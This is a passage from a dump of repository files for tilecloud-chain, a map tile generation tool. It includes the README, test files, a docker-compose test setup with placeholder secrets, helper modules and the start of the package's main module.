SQS queue, AWS host, SNS topic.\n\nDestination in WMTS layout, on S3, on Berkeley DB (`bsddb`), on MBTiles, or on local filesystem.\n\nFeatures:\n\n- Generate tiles.\n- Drop empty tiles.\n- Drop tiles outside a geometry or a bbox.\n- Use MetaTiles.\n- Generate the legend images.\n- Generate GetCapabilities.\n- Generate OpenLayers example page.\n- Obtain the hash of an empty tile.\n- In the future, measure tile generation speed.\n- Calculate cost and generation time.\n- In the future, manage the AWS hosts that generate tiles.\n- Delete empty tiles.\n- Copy files between caches.\n- Be able to use an SQS queue to dispatch the generation.\n- Post processing the generated tiles.\n- ...\n\nLegacy features:\n\n- bsddb support\n- sqlite (mbtiles) support\n- mapnik support (should be updated for Python3)\n\n## Get it\n\nCreate the config file `tilegeneration/config.yaml` see as [example](https://github.com/camptocamp/tilecloud-chain/blob/master/example/tilegeneration/config.yaml).\n\n### Support\n\nOnly the latest release is supported and version &lt; 1.11 contains security issues.\n\n## From sources\n\nBuild it:\n\n```bash\ngit submodule update --recursive\npython3 -m venv .build/venv\n.build/venv/bin/pip install -r requirements.txt\n.build/venv/bin/pip install -e .\n.build/venv/bin/pip install -r dev-requirements.txt\n```\n\n## Run prospector\n\n```bash\n.build/venv/bin/prospector\n```\n\n## Run the tests\n\nSetup your environment:\n\n```bash\ntouch tilecloud_chain/OpenLayers.js\ndocker build --tag camptocamp/tilecloud-chain .\ndocker-compose -p tilecloud up\n```\n\nTo run the tests:\n\n```bash\ndocker-compose -p tilecloud exec test python setup.py nosetests --logging-filter=tilecloud,tilecloud_chain --attr '!'nopy3\n```\n\n## Documentation\n\nAs documentation you can read the `https://github.com/camptocamp/tilecloud-chain/blob/master/tilecloud_chain/USAGE.rst`.\n\n## VSCode\n\nYou can add that in your workspace configuration to use the JSON schema:\n\n```json\n{\n \"yaml.schemas\": {\n \"../tilecloud-chain/tilecloud_chain/schema.json\": [\n \"tilecloud-chain/tilecloud_chain/tests/tilegeneration/*.yaml\"\n ]\n }\n}\n```\n\n## Contributing\n\nInstall the pre-commit hooks:\n\n```bash\npip install pre-commit\npre-commit install --allow-missing-config\n```\n" }, { "alpha_fraction": 0.6358974575996399, "alphanum_fraction": 0.6358974575996399, "avg_line_length": 27.88888931274414, "blob_id": "50b354a249997405b2fb414a5ef8dfac68c37dc1", "content_id": "7cd98c6a2f89a7f7a87744fdd3453382b072fd40", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 780, "license_type": "permissive", "max_line_length": 109, "num_lines": 27, "path": "/tilecloud_chain/tests/test_config.py", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "import os\n\nfrom testfixtures import LogCapture\n\nfrom tilecloud_chain import controller\nfrom tilecloud_chain.tests import CompareCase\n\n\nclass TestConfig(CompareCase):\n def setUp(self) -> None: # noqa\n self.maxDiff = None\n\n @classmethod\n def setUpClass(cls): # noqa\n os.chdir(os.path.dirname(__file__))\n\n @classmethod\n def tearDownClass(cls): # noqa\n os.chdir(os.path.dirname(os.path.dirname(os.path.dirname(__file__))))\n\n def test_int_grid(self) -> None:\n with LogCapture(\"tilecloud_chain\") as log_capture:\n self.run_cmd(\n cmd=\".build/venv/bin/generate_controller -c tilegeneration/test-int-grid.yaml --dump-config\",\n main_func=controller.main,\n )\n log_capture.check()\n" }, { "alpha_fraction": 0.6021457314491272, "alphanum_fraction": 0.6325435638427734, "avg_line_length": 23.85555648803711, "blob_id": "d8424a44c9c8c1ac6f9e51b462fddcc68a32b0a5", "content_id": "fc90599328f07b2c6472a314c2ecc42b47cc8d50", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "YAML", "length_bytes": 2237, "license_type": "permissive", "max_line_length": 81, "num_lines": 90, "path": "/docker-compose.yaml", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "version: '2.2'\n\nservices:\n db:\n image: camptocamp/postgres:14-postgis-3\n environment:\n POSTGRES_USER: postgres\n POSTGRES_PASSWORD: postgres\n POSTGRES_DB: tests\n volumes:\n - ./docker/test-db:/docker-entrypoint-initdb.d:ro\n\n mapserver:\n image: camptocamp/mapserver:8.0\n environment:\n MS_DEBUGLEVEL: '5'\n MAPSERVER_CATCH_SEGV: '1'\n MS_MAPFILE: /etc/mapserver/mapserver.map\n volumes:\n - ./docker/mapfile-docker:/etc/mapserver:ro\n links:\n - db:db\n user: www-data\n\n redis_master:\n image: redis:7.0.12\n\n redis_slave:\n image: redis:7.0.12\n command: redis-server --slaveof redis_master 6379\n depends_on:\n - redis_master\n\n redis_sentinel:\n image: camptocamp/c2cwsgiutils-redis-sentinel:6\n environment:\n - MASTER_NAME=mymaster\n - QUORUM=1\n - MASTER=redis_master\n depends_on:\n - redis_master\n\n application: &app\n image: camptocamp/tilecloud-chain\n environment: &app-env\n TILECLOUD_LOG_LEVEL: DEBUG\n TILECLOUD_CHAIN_LOG_LEVEL: DEBUG\n TILECLOUD_CHAIN_SESSION_SECRET: '1234'\n TILECLOUD_CHAIN_SESSION_SALT: '1234'\n C2C_AUTH_GITHUB_REPOSITORY: camptocamp/tilecloud-chain\n C2C_AUTH_GITHUB_SECRET: '1234567890123456789'\n C2C_AUTH_GITHUB_CLIENT_ID: '1234'\n C2C_AUTH_GITHUB_CLIENT_SECRET: '1234'\n links:\n - db\n - mapserver\n - redis_sentinel\n volumes:\n - ./example/tilegeneration/config.yaml:/etc/tilegeneration/config.yaml:ro\n\n app_test_user:\n <<: *app\n environment:\n <<: *app-env\n TEST_USER: Test\n\n test:\n image: camptocamp/tilecloud-chain-tests\n working_dir: /app\n environment:\n CI: 'true'\n TESTS: 'true'\n PGPASSWORD: postgres\n TILE_NB_THREAD: 2\n METATILE_NB_THREAD: 2\n SERVER_NB_THREAD: 2\n TILECLOUD_LOG_LEVEL: DEBUG\n TILECLOUD_CHAIN_LOG_LEVEL: DEBUG\n TILECLOUD_CHAIN_SESSION_SALT: a-long-secret-a-long-secret\n command:\n - sleep\n - infinity\n links:\n - db\n - mapserver\n - redis_sentinel\n volumes:\n - ./results:/results\n - ./tilecloud_chain:/app/tilecloud_chain\n # - ../tilecloud/tilecloud:/usr/local/lib/python3.8/dist-packages/tilecloud\n" }, { "alpha_fraction": 0.5660377144813538, "alphanum_fraction": 0.5998013615608215, "avg_line_length": 33.72413635253906, "blob_id": "2426d01c01a8d5e33fde6f962f7c83f9f69df9f2", "content_id": "ae686d1f2bcab44b8a7611fc53246087ac2795aa", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1007, "license_type": "permissive", "max_line_length": 99, "num_lines": 29, "path": "/tilecloud_chain/format.py", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "from datetime import timedelta\nfrom typing import Tuple\n\n\ndef default_int(number_array: Tuple[float, float, float, float]) -> Tuple[int, int, int, int]:\n \"\"\"Convert an array of float in an array of int.\"\"\"\n return (int(number_array[0]), int(number_array[1]), int(number_array[2]), int(number_array[3]))\n\n\ndef size_format(number: float) -> str:\n \"\"\"Get human readable size.\"\"\"\n for unit in [\"o\", \"Kio\", \"Mio\", \"Gio\", \"Tio\"]:\n if number < 1024.0:\n if number < 10:\n return f\"{number:.1f} {unit}\"\n else:\n return f\"{number:.0f} {unit}\"\n number /= 1024.0\n return f\"{number:.0f} Tio\"\n\n\ndef duration_format(duration: timedelta) -> str:\n \"\"\"Get human readable duration.\"\"\"\n hours, remainder = divmod(duration.seconds, 3600)\n minutes, seconds = divmod(remainder, 60)\n if duration.days > 0:\n return f\"{duration.days} {hours}:{minutes:02d}:{seconds:02d}\"\n else:\n return f\"{hours}:{minutes:02d}:{seconds:02d}\"\n" }, { "alpha_fraction": 0.7636632323265076, "alphanum_fraction": 0.7725258469581604, "avg_line_length": 25.038461685180664, "blob_id": "37a349abf38e2f0255096ebe66cd80333d945491", "content_id": "b6107a2c1224b6d3e308815d0c421125302a045b", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 677, "license_type": "permissive", "max_line_length": 84, "num_lines": 26, "path": "/production.ini", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "###\n# app configuration\n# http://docs.pylonsproject.org/projects/pyramid/en/1.6-branch/narr/environment.html\n###\n\n[app:app]\nuse = egg:tilecloud-chain\nfilter-with = proxy-prefix\n\npyramid.reload_templates = %(DEVELOPMENT)s\npyramid.debug_authorization = %(DEVELOPMENT)s\npyramid.debug_notfound = %(DEVELOPMENT)s\npyramid.debug_routematch = %(DEVELOPMENT)s\npyramid.debug_templates = %(DEVELOPMENT)s\npyramid.default_locale_name = en\n\nc2c.base_path = /c2c\n\ntilegeneration_configfile = %(TILEGENERATION_CONFIGFILE)s\n\n[pipeline:main]\npipeline = egg:c2cwsgiutils#client_info egg:c2cwsgiutils#sentry app\n\n[filter:proxy-prefix]\nuse = egg:PasteDeploy#prefix\nprefix = %(VISIBLE_ENTRY_POINT)s\n" }, { "alpha_fraction": 0.3723404109477997, "alphanum_fraction": 0.4645390212535858, "avg_line_length": 22.5, "blob_id": "6d9aaa48c82ae9f38e63e1ed87634a565116ca65", "content_id": "74c199e0c983f9c926b722e04a0d5280fe5a703a", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 282, "license_type": "permissive", "max_line_length": 29, "num_lines": 12, "path": "/SECURITY.md", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "# Security Policy\n\n## Supported Versions\n\n| Version | Supported Until |\n| ------- | --------------- |\n| <= 1.13 | Unsupported |\n| 1.14 | Unsupported |\n| 1.15 | Best effort |\n| 1.16 | Unsupported |\n| 1.17 | 23/06/2025 |\n| 1.18 | Best effort |\n" }, { "alpha_fraction": 0.38553711771965027, "alphanum_fraction": 0.5177651047706604, "avg_line_length": 41.97604751586914, "blob_id": "69dc3b97a93df27bdaf2397ec2df63f409954a5a", "content_id": "4875cda4d906be7f1fba665a198d9b10c51e77ed", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7177, "license_type": "permissive", "max_line_length": 103, "num_lines": 167, "path": "/tilecloud_chain/tests/test_expiretiles.py", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "import os\nfrom typing import Tuple\n\nimport psycopg2\nimport pytest\nfrom testfixtures import LogCapture\n\nfrom tilecloud_chain import expiretiles\nfrom tilecloud_chain.tests import CompareCase, MatchRegex\n\n\nclass TestExpireTiles(CompareCase):\n def setUp(self) -> None: # noqa\n self.maxDiff = None\n\n @classmethod\n def setUpClass(cls): # noqa\n with open(\"/tmp/expired\", \"w\") as f:\n f.write(\"18/135900/92720\\n\")\n f.write(\"18/135900/92721\\n\")\n f.write(\"18/135900/92722\\n\")\n f.write(\"18/135901/92721\\n\")\n f.write(\"18/135901/92722\\n\")\n f.write(\"18/135902/92722\\n\")\n\n with open(\"/tmp/expired-empty\", \"w\"):\n pass\n\n @classmethod\n def tearDownClass(cls): # noqa\n os.remove(\"/tmp/expired\")\n os.remove(\"/tmp/expired-empty\")\n\n def test_expire_tiles(\n self,\n ) -> None:\n with LogCapture(\"tilecloud_chain\", level=30) as log_capture:\n geom_re = MatchRegex(r\"MULTIPOLYGON\\(\\(\\(([0-9\\. ,]+)\\)\\)\\)\")\n geom_coords = [\n pytest.approx([538274.006497397, 151463.940954133], abs=1e-6),\n pytest.approx([538272.927475664, 151358.882137848], abs=1e-6),\n pytest.approx([538167.532395446, 151359.965536437], abs=1e-6),\n pytest.approx([538062.137334338, 151361.050781072], abs=1e-6),\n pytest.approx([537956.742292377, 151362.137871759], abs=1e-6),\n pytest.approx([537957.826834589, 151467.19663084], abs=1e-6),\n pytest.approx([537958.911357866, 151572.253567259], abs=1e-6),\n pytest.approx([537959.995862209, 151677.308681051], abs=1e-6),\n pytest.approx([538065.385383791, 151676.221647663], abs=1e-6),\n pytest.approx([538064.302719542, 151571.166514773], abs=1e-6),\n pytest.approx([538169.694100363, 151570.08130827], abs=1e-6),\n pytest.approx([538168.61325734, 151465.024333685], abs=1e-6),\n pytest.approx([538274.006497397, 151463.940954133], abs=1e-6),\n ]\n\n self.assert_cmd_equals(\n cmd=[\n \".build/venv/bin/import_expiretiles\",\n \"--create\",\n \"--delete\",\n \"--srid\",\n \"21781\",\n \"/tmp/expired\",\n \"user=postgres password=postgres dbname=tests host=db\",\n \"expired\",\n \"the_geom\",\n ],\n main_func=expiretiles.main,\n expected=\"\"\"Import successful\n \"\"\",\n )\n connection = psycopg2.connect(\"user=postgres password=postgres dbname=tests host=db\")\n cursor = connection.cursor()\n cursor.execute(\"SELECT ST_AsText(the_geom) FROM expired\")\n geoms = [str(r[0]) for r in cursor.fetchall()]\n assert [geom_re] == geoms\n\n def parse_coord(coord: str) -> Tuple[float, float]:\n coord_split = coord.split(\" \")\n return [float(c) for c in coord_split]\n\n assert [parse_coord(e) for e in geom_re.match(geoms[0]).group(1).split(\",\")] == geom_coords\n\n self.assert_cmd_equals(\n cmd=[\n \".build/venv/bin/import_expiretiles\",\n \"--create\",\n \"--delete\",\n \"--srid\",\n \"21781\",\n \"/tmp/expired\",\n \"user=postgres password=postgres dbname=tests host=db\",\n \"expired\",\n \"the_geom\",\n ],\n main_func=expiretiles.main,\n expected=\"\"\"Import successful\n \"\"\",\n )\n connection = psycopg2.connect(\"user=postgres password=postgres dbname=tests host=db\")\n cursor = connection.cursor()\n cursor.execute(\"SELECT ST_AsText(the_geom) FROM expired\")\n geoms = [str(r[0]) for r in cursor.fetchall()]\n assert [geom_re] == geoms\n assert [parse_coord(e) for e in geom_re.match(geoms[0]).group(1).split(\",\")] == geom_coords\n\n self.assert_cmd_equals(\n cmd=[\n \".build/venv/bin/import_expiretiles\",\n \"--simplify\",\n \"1000\",\n \"--create\",\n \"--delete\",\n \"/tmp/expired\",\n \"user=postgres password=postgres dbname=tests host=db\",\n \"expired2\",\n ],\n main_func=expiretiles.main,\n expected=\"\"\"Import successful\n \"\"\",\n )\n connection = psycopg2.connect(\"user=postgres password=postgres dbname=tests host=db\")\n cursor = connection.cursor()\n cursor.execute(\"SELECT ST_AsText(geom) FROM expired2\")\n geoms = [str(r[0]) for r in cursor.fetchall()]\n geom_coords = [\n pytest.approx([738534.567188568, 5862720.06865692], abs=1e-6),\n pytest.approx([738534.567188568, 5862567.19460037], abs=1e-6),\n pytest.approx([738381.693132021, 5862567.19460037], abs=1e-6),\n pytest.approx([738228.819075469, 5862567.19460037], abs=1e-6),\n pytest.approx([738075.945018921, 5862567.19460037], abs=1e-6),\n pytest.approx([738075.945018921, 5862720.06865692], abs=1e-6),\n pytest.approx([738075.945018921, 5862872.94271347], abs=1e-6),\n pytest.approx([738075.945018921, 5863025.81677002], abs=1e-6),\n pytest.approx([738228.819075469, 5863025.81677002], abs=1e-6),\n pytest.approx([738228.819075469, 5862872.94271347], abs=1e-6),\n pytest.approx([738381.693132021, 5862872.94271347], abs=1e-6),\n pytest.approx([738381.693132021, 5862720.06865692], abs=1e-6),\n pytest.approx([738534.567188568, 5862720.06865692], abs=1e-6),\n ]\n assert [geom_re] == geoms\n assert [parse_coord(e) for e in geom_re.match(geoms[0]).group(1).split(\",\")] == geom_coords\n\n log_capture.check()\n\n def test_expire_tiles_empty(self) -> None:\n with LogCapture(\"tilecloud_chain\", level=30) as log_capture:\n self.assert_cmd_equals(\n cmd=[\n \".build/venv/bin/import_expiretiles\",\n \"--create\",\n \"--delete\",\n \"--srid\",\n \"21781\",\n \"/tmp/expired-empty\",\n \"user=postgres password=postgres dbname=tests host=db\",\n \"expired\",\n \"the_geom\",\n ],\n main_func=expiretiles.main,\n expected=\"\"\"No coords found\n \"\"\",\n )\n connection = psycopg2.connect(\"user=postgres password=postgres dbname=tests host=db\")\n cursor = connection.cursor()\n cursor.execute(\"SELECT the_geom FROM expired\")\n geoms = cursor.fetchall()\n self.assertEqual(len(geoms), 0)\n" }, { "alpha_fraction": 0.5296049118041992, "alphanum_fraction": 0.5354918837547302, "avg_line_length": 37.30424880981445, "blob_id": "171c801460719dccf1b23e63a8f047208b6d217b", "content_id": "3f6cf91f769c71daca4d8eec167956fe764dbaee", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 67607, "license_type": "permissive", "max_line_length": 178, "num_lines": 1765, "path": "/tilecloud_chain/__init__.py", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "import collections\nimport json\nimport logging\nimport logging.config\nimport math\nimport os\nimport pathlib\nimport pkgutil\nimport queue\nimport re\nimport sqlite3\nimport subprocess # nosec\nimport sys\nimport tempfile\nimport threading\nimport time\nfrom argparse import ArgumentParser, Namespace\nfrom concurrent.futures import ThreadPoolExecutor\nfrom datetime import datetime, timedelta\nfrom fractions import Fraction\nfrom hashlib import sha1\nfrom io import BytesIO\nfrom itertools import product\nfrom math import ceil, sqrt\nfrom typing import (\n IO,\n TYPE_CHECKING,\n Any,\n Callable,\n Dict,\n Iterable,\n Iterator,\n List,\n Optional,\n TextIO,\n Tuple,\n TypedDict,\n Union,\n cast,\n)\n\nimport boto3\nimport botocore.client\nimport c2cwsgiutils.pyramid_logging\nimport c2cwsgiutils.setup_process\nimport jsonschema_validator\nimport psycopg2\nfrom c2cwsgiutils import sentry\nfrom PIL import Image\nfrom prometheus_client import Counter, Summary\nfrom ruamel.yaml import YAML\nfrom shapely.geometry.base import BaseGeometry\nfrom shapely.geometry.polygon import Polygon\nfrom shapely.ops import unary_union\nfrom shapely.wkb import loads as loads_wkb\n\nimport tilecloud.filter.error\nimport tilecloud_chain.configuration\nimport tilecloud_chain.security\nfrom tilecloud import BoundingPyramid, Tile, TileCoord, TileGrid, TileStore, consume\nfrom tilecloud.filter.error import LogErrors, MaximumConsecutiveErrors\nfrom tilecloud.filter.logger import Logger\nfrom tilecloud.grid.free import FreeTileGrid\nfrom tilecloud.layout.wmts import WMTSTileLayout\nfrom tilecloud.store.azure_storage_blob import AzureStorageBlobTileStore\nfrom tilecloud.store.filesystem import FilesystemTileStore\nfrom tilecloud.store.mbtiles import MBTilesTileStore\nfrom tilecloud.store.metatile import MetaTileSplitterTileStore\nfrom tilecloud.store.redis import RedisTileStore\nfrom tilecloud.store.s3 import S3TileStore\nfrom tilecloud.store.sqs import SQSTileStore, maybe_stop\nfrom tilecloud_chain.multitilestore import MultiTileStore\nfrom tilecloud_chain.timedtilestore import TimedTileStoreWrapper\n\n_LOGGER = logging.getLogger(__name__)\n\n\n_ERROR_COUNTER = Counter(\"tilecloud_chain_error_counter\", \"Number of errors\", [\"layer\", \"host\"])\n_GEOMS_GET_SUMMARY = Summary(\"tilecloud_chain_geoms_get\", \"Geoms filter get\", [\"layer\", \"host\"])\n\n\ndef formated_metadata(tile: Tile) -> str:\n \"\"\"Get human redable string of the metadata.\"\"\"\n metadata = dict(tile.metadata)\n if \"tiles\" in metadata:\n metadata[\"tiles\"] = metadata[\"tiles\"].keys() # type: ignore\n return \" \".join([f\"{k}={metadata[k]}\" for k in sorted(metadata.keys())])\n\n\nsetattr(Tile, \"formated_metadata\", property(formated_metadata))\n\n\ndef add_common_options(\n parser: ArgumentParser,\n tile_pyramid: bool = True,\n no_geom: bool = True,\n near: bool = True,\n time: bool = True, # pylint: disable=redefined-outer-name\n dimensions: bool = False,\n cache: bool = True,\n default_config_file: bool = False,\n) -> None:\n \"\"\"Get the options used by some commands.\"\"\"\n c2cwsgiutils.setup_process.fill_arguments(parser)\n parser.add_argument(\n \"-c\",\n \"--config\",\n default=os.environ.get(\"TILEGENERATION_CONFIGFILE\", \"tilegeneration/config.yaml\")\n if default_config_file\n else None,\n help=\"path to the configuration file\",\n metavar=\"FILE\",\n )\n parser.add_argument(\n \"--host\", help=\"the host name used in JSON logs and in the Prometheus stats\", default=\"localhost\"\n )\n parser.add_argument(\n \"--ignore-error\",\n action=\"store_true\",\n help=\"continue if there is an error in the configuration\",\n )\n parser.add_argument(\"-l\", \"--layer\", metavar=\"NAME\", help=\"the layer to generate\")\n if tile_pyramid:\n parser.add_argument(\n \"-b\",\n \"--bbox\",\n nargs=4,\n type=float,\n metavar=(\"MINX\", \"MINY\", \"MAXX\", \"MAXY\"),\n help=\"restrict to specified bounding box\",\n )\n parser.add_argument(\n \"-z\",\n \"--zoom\",\n help=\"restrict to specified zoom level, or a zooms range (2-5), or a zooms list (2,4,5)\",\n )\n parser.add_argument(\n \"-t\", \"--test\", type=int, help=\"test with generating N tiles, and add log messages\", metavar=\"N\"\n )\n if near:\n parser.add_argument(\n \"--near\",\n type=float,\n nargs=2,\n metavar=(\"X\", \"Y\"),\n help=\"This option is a good replacement of --bbox, to used with \"\n \"--time or --test and --zoom, implies --no-geom. \"\n \"It automatically measure a bbox around the X Y position that corresponds to the metatiles.\",\n )\n if time:\n parser.add_argument(\n \"--time\",\n \"--measure-generation-time\",\n dest=\"time\",\n metavar=\"N\",\n type=int,\n help=\"Measure the generation time by creating N tiles to warm-up, \"\n \"N tile to do the measure and N tiles to slow-down\",\n )\n if no_geom:\n parser.add_argument(\n \"--no-geom\",\n default=True,\n action=\"store_false\",\n dest=\"geom\",\n help=\"Don't the geometry available in the SQL\",\n )\n if dimensions:\n parser.add_argument(\n \"--dimensions\",\n nargs=\"+\",\n metavar=\"DIMENSION=VALUE\",\n default=[],\n help=\"overwrite the dimensions values specified in the config file\",\n )\n if cache:\n parser.add_argument(\"--cache\", dest=\"cache\", metavar=\"NAME\", help=\"The cache name to use\")\n parser.add_argument(\"-q\", \"--quiet\", default=False, action=\"store_true\", help=\"Display only errors.\")\n parser.add_argument(\"-v\", \"--verbose\", default=False, action=\"store_true\", help=\"Display info message.\")\n parser.add_argument(\n \"-d\",\n \"--debug\",\n default=False,\n action=\"store_true\",\n help=\"Display debug message, and stop on first error.\",\n )\n\n\ndef get_tile_matrix_identifier(\n grid: tilecloud_chain.configuration.Grid, resolution: Optional[float] = None, zoom: Optional[int] = None\n) -> str:\n \"\"\"Get an identifier for a tile matrix.\"\"\"\n if grid is None or grid[\"matrix_identifier\"] == \"zoom\":\n return str(zoom)\n else:\n assert zoom is not None\n if resolution is None:\n resolution = grid[\"resolutions\"][zoom]\n if int(resolution) == resolution:\n return str(int(resolution))\n else:\n return str(resolution).replace(\".\", \"_\")\n\n\nclass Run:\n \"\"\"\n Run the tile generation.\n\n Add some logs.\n Manage the max_consecutive_errors.\n \"\"\"\n\n _re_rm_xml_tag = re.compile(\"(<[^>]*>|\\n)\")\n\n def __init__(\n self,\n gene: \"TileGeneration\",\n functions: List[Callable[[Tile], Tile]],\n ) -> None:\n self.gene = gene\n self.functions = functions\n self.safe = gene.options is None or not gene.options.debug\n daemon = gene.options is not None and getattr(gene.options, \"daemon\", False)\n self.max_consecutive_errors = (\n MaximumConsecutiveErrors(gene.get_main_config().config[\"generation\"][\"maxconsecutive_errors\"])\n if not daemon and gene.maxconsecutive_errors\n else None\n )\n self.error = 0\n self.error_lock = threading.Lock()\n self.error_logger = LogErrors(\n _LOGGER, logging.ERROR, \"Error in tile: %(tilecoord)s, %(formated_metadata)s, %(error)r\"\n )\n\n def __call__(self, tile: Optional[Tile]) -> Optional[Tile]:\n if tile is None:\n return None\n\n if \"tiles\" in tile.metadata:\n tile.metadata[\"tiles\"][tile.tilecoord] = tile # type: ignore\n\n tilecoord = tile.tilecoord\n _LOGGER.debug(\"[%s] Metadata: %s\", tilecoord, tile.formated_metadata)\n for func in self.functions:\n try:\n _LOGGER.debug(\"[%s] Run: %s\", tilecoord, func)\n n = datetime.now()\n if self.safe:\n try:\n tile = func(tile)\n except Exception as e:\n _LOGGER.exception(\"[%s] Fail to process function %s\", tilecoord, func)\n tile.error = e\n else:\n tile = func(tile)\n _LOGGER.debug(\"[%s] %s in %s\", tilecoord, func.time_message if getattr(func, \"time_message\", None) is not None else func, str(datetime.now() - n)) # type: ignore\n if tile is None:\n _LOGGER.debug(\"[%s] Drop\", tilecoord)\n return None\n if tile.error:\n if tile.content_type and tile.content_type.startswith(\"application/vnd.ogc.se_xml\"):\n assert isinstance(tile.error, str)\n tile.error = f\"WMS server error: {self._re_rm_xml_tag.sub('', tile.error)}\"\n _LOGGER.warning(\"Error with tile %s:\\n%s\", tile.tilecoord, tile.error)\n _ERROR_COUNTER.labels(\n tile.metadata.get(\"layer\", \"none\"), tile.metadata.get(\"host\", \"none\")\n ).inc()\n\n if \"error_file\" in self.gene.get_main_config().config[\"generation\"]:\n self.gene.log_tiles_error(tile=tile, message=repr(tile.error))\n\n if self.max_consecutive_errors is not None:\n self.max_consecutive_errors(tile)\n\n if self.gene.queue_store is not None:\n self.gene.queue_store.delete_one(tile)\n with self.error_lock:\n self.error += 1\n return tile\n except Exception:\n _LOGGER.debug(\"Run error\", stack_info=True)\n raise\n\n if self.max_consecutive_errors is not None:\n self.max_consecutive_errors(tile)\n\n return tile\n\n\nclass Close:\n \"\"\"Database closer.\"\"\"\n\n def __init__(self, db: Any) -> None:\n self.db = db\n\n def __call__(self) -> None:\n self.db.close()\n\n\nclass Legend(TypedDict, total=False):\n \"\"\"Legend fields.\"\"\"\n\n mime_type: str\n href: str\n max_resolution: float\n min_resolution: float\n width: int\n height: int\n\n\nclass DatedConfig:\n \"\"\"Loaded config with timestamps to be able to invalidate it on configuration file change.\"\"\"\n\n def __init__(self, config: tilecloud_chain.configuration.Configuration, mtime: float, file: str) -> None:\n self.config = config\n self.mtime = mtime\n self.file = file\n\n\nclass DatedGeoms:\n \"\"\"Geoms with timestamps to be able to invalidate it on configuration change.\"\"\"\n\n def __init__(self, geoms: Dict[Union[str, int], BaseGeometry], mtime: float) -> None:\n self.geoms = geoms\n self.mtime = mtime\n\n\nclass DatedTileGrid:\n \"\"\"TilGrid with timestamps to be able to invalidate it on configuration change.\"\"\"\n\n def __init__(self, grid: TileGrid, mtime: float) -> None:\n self.grid = grid\n self.mtime = mtime\n\n\nclass DatedHosts:\n \"\"\"Host with timestamps to be able to invalidate it on configuration change.\"\"\"\n\n def __init__(self, hosts: Dict[str, str], mtime: float) -> None:\n self.hosts = hosts\n self.mtime = mtime\n\n\nclass MissingErrorFileException(Exception):\n \"\"\"Missing error file exception.\"\"\"\n\n\nclass LoggingInformation(TypedDict):\n \"\"\"Logging information.\"\"\"\n\n host: Optional[str]\n layer: Optional[str]\n meta_tilecoord: str\n\n\nLOGGING_CONTEXT: Dict[int, Dict[int, LoggingInformation]] = {}\n\n\nclass JsonLogHandler(c2cwsgiutils.pyramid_logging.JsonLogHandler):\n \"\"\"Log to stdout in JSON.\"\"\"\n\n def __init__(self, stream: Optional[TextIO] = None):\n super().__init__(stream)\n self.addFilter(TileFilter())\n\n\nclass TileFilter(logging.Filter):\n \"\"\"A logging filter that adds request information to CEE logs.\"\"\"\n\n def filter(self, record: Any) -> bool:\n thread_id = threading.current_thread().native_id\n assert thread_id is not None\n log_info = LOGGING_CONTEXT.get(os.getpid(), {}).get(thread_id)\n\n if log_info is not None:\n record.tcc_host = log_info[\"host\"]\n record.tcc_layer = log_info[\"layer\"]\n record.tcc_meta_tilecoord = log_info[\"meta_tilecoord\"]\n\n return True\n\n\nclass TileGeneration:\n \"\"\"Base class of all the tile generation.\"\"\"\n\n tilestream: Optional[Iterator[Tile]] = None\n duration: timedelta = timedelta()\n error = 0\n queue_store: Optional[TileStore] = None\n daemon = False\n\n def __init__(\n self,\n config_file: Optional[str] = None,\n options: Optional[Namespace] = None,\n layer_name: Optional[str] = None,\n base_config: Optional[tilecloud_chain.configuration.Configuration] = None,\n configure_logging: bool = True,\n multi_thread: bool = True,\n maxconsecutive_errors: bool = True,\n ):\n self.geoms_cache: Dict[str, Dict[str, DatedGeoms]] = {}\n self._close_actions: List[\"Close\"] = []\n self.error_lock = threading.Lock()\n self.error_files_: Dict[str, TextIO] = {}\n self.functions_tiles: List[Callable[[Tile], Tile]] = []\n self.functions_metatiles: List[Callable[[Tile], Tile]] = []\n self.functions = self.functions_metatiles\n self.metatilesplitter_thread_pool: Optional[ThreadPoolExecutor] = None\n self.multi_thread = multi_thread\n self.maxconsecutive_errors = maxconsecutive_errors\n self.grid_cache: Dict[str, Dict[str, DatedTileGrid]] = {}\n self.layer_legends: Dict[str, List[Legend]] = {}\n self.config_file = config_file\n self.base_config = base_config\n self.configs: Dict[str, DatedConfig] = {}\n self.hosts_cache: Optional[DatedHosts] = None\n\n self.options: Namespace = options or collections.namedtuple( # type: ignore\n \"Options\",\n [\"verbose\", \"debug\", \"quiet\", \"bbox\", \"zoom\", \"test\", \"near\", \"time\", \"geom\", \"ignore_error\"],\n )(\n False, False, False, None, None, None, None, None, True, False # type: ignore\n )\n del options\n if not hasattr(self.options, \"bbox\"):\n self.options.bbox = None\n if not hasattr(self.options, \"zoom\"):\n self.options.zoom = None\n if not hasattr(self.options, \"test\"):\n self.options.test = None\n if not hasattr(self.options, \"near\"):\n self.options.near = None\n if not hasattr(self.options, \"time\"):\n self.options.time = None\n if not hasattr(self.options, \"geom\"):\n self.options.geom = True\n if not hasattr(self.options, \"ignore_error\"):\n self.options.ignore_error = False\n\n if configure_logging:\n if os.environ.get(\"CI\", \"false\").lower() != \"true\":\n ###\n # logging configuration\n # https://docs.python.org/3/library/logging.config.html#logging-config-dictschema\n ###\n logging.config.dictConfig(\n {\n \"version\": 1,\n \"root\": {\n \"level\": os.environ[\"OTHER_LOG_LEVEL\"],\n \"handlers\": [os.environ[\"LOG_TYPE\"]],\n },\n \"loggers\": {\n \"gunicorn.error\": {\"level\": 